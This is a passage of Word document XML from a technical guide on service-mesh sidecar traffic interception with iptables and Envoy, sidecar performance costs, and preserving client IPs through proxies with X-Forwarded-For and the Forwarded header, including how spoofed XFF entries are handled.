    <w:p w14:paraId="4664A688" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>iptables -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 15001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55960F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4"/>
    <w:p w14:paraId="546A9171" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t># Redirect all inbound traffic to the sidecar's port (15006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175A8DA5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>iptables -t nat -A PREROUTING -p tcp -j REDIRECT --to-port 15006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8B482" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The application thinks it's connecting directly to orders-service:8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B31903A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>But iptables redirects the connection to localhost:15001 (the Envoy sidecar).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6776F954" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Envoy handles service discovery, load balancing, TLS, retries — then forwards to the actual destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47F9E2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Inbound traffic similarly hits Envoy first (port 15006) before reaching the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164A424C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The result:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Complete traffic interception without ANY application code changes. The application is entirely unaware of the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE265E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 What the Sidecar Proxy Does</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A72A5F0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outbound (when application makes a request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54AE19" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Receives the redirected connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA7BA9E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Determines the original destination (using SO_ORIGINAL_DST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAF0874" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Looks up routing rules from the control plane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E427CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Applies load balancing (picks a specific backend instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D7BF43" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Establishes mTLS to the destination's sidecar proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1345E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Forwards the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D301D8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Applies retry logic if the request fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA9383" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Applies circuit breaker logic if the backend is unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9CC7A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Reports metrics (latency, success/failure, bytes transferred).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10262D87" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inbound (when receiving a request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD5947" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Terminates mTLS from the caller's sidecar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46CC56" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Verifies the caller's service identity (via the client certificate's SPIFFE ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5319ED63" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Applies authorization policy ("Is service X allowed to call method Y on me?").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4C941" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Enforces rate limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469997BB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Forwards to the local application on localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5EC7F7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="662"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Reports metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829F8D8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.4 The Performance Cost of Sidecar Proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C2D17" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Added latency per hop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AB528" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Two sidecar proxies per service-to-service call (sender's outbound + receiver's inbound).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0224854B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each adds ~0.5–2ms of latency (connection handling, TLS, routing logic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A45D8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="663"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>For a request traversing 5 services: 10 proxy hops × ~1ms = ~10ms added latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F640C4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F931E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="664"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each Envoy sidecar: ~50MB RAM baseline, ~100MB under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BBFA9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="664"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>In a cluster with 1,000 pods: ~100GB just for sidecars.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4A777" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="664"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>CPU: ~5–10% overhead for crypto (mTLS) and routing logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B293775" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Optimization — eBPF-based mesh (Cilium):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174131F6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Instead of a userspace sidecar proxy, implement some functionality directly in the Linux kernel using eBPF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B267585" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>L4 load balancing without leaving kernel space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D775046" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>mTLS (experimental) at the kernel level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F68EA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Eliminates the two-hop userspace proxy overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278D0E6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Reduces latency to microseconds instead of milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF2ACA4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="3F0294C9">
          <v:rect id="_x0000_i3324" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD60C69" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Proxy Protocols — Preserving Client Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA6FA39" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 The Problem — Lost Client Identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DA53FE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>When a proxy forwards a request, the backend sees the PROXY's IP as the client — not the real user's IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D517B6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB4BD4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Logging: need real client IP for analytics, debugging, fraud detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0798CC07" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Rate limiting: need to limit per REAL client, not per proxy IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD7CB03" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Geolocation: need real client location for compliance and routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093FAD8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Access control: IP-based allowlists must see the real IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B189E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 HTTP Headers Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBC51D1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X-Forwarded-For (XFF):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BB8D6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each proxy in the chain appends the previous hop's IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540EB186" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BD3BF8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client (1.2.3.4) → Proxy A (10.0.0.1) → Proxy B (10.0.0.2) → Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B26E36" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4"/>
    <w:p w14:paraId="183AF4A5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-Forwarded-For: 1.2.3.4, 10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C82E6B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The backend reads the FIRST entry to get the real client IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A9757F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security issue:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> A malicious client can set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D4C92" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F6929" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-Forwarded-For: 6.6.6.6 (fake)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB227DA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Then after traversing the proxy chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAFCDDA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16792779" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-Forwarded-For: 6.6.6.6, 1.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC096D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>If the backend naively reads the first entry → it trusts the spoofed IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32647A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The backend must know how many trusted proxies are in the chain. It counts from the RIGHT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4579E8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>2 trusted proxies → real client is entry at position length - 2 from the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16628E1A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="667"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Or: strip the known number of trusted proxy entries, the remaining rightmost entry is the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF24699" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Other X-Forwarded- headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B3C8A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-Forwarded-Proto: https — original protocol (client used HTTPS even if backend connection is HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E559F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-Forwarded-Host: www.example.com — original Host header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F478649" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="668"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>X-Forwarded-Port: 443 — original port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F769F8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Standardized replacement: Forwarded header (RFC 7239):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA94BEC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD28E19" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Forwarded: for=1.2.3.4;proto=https;host=example.com;by=10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A24E78" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
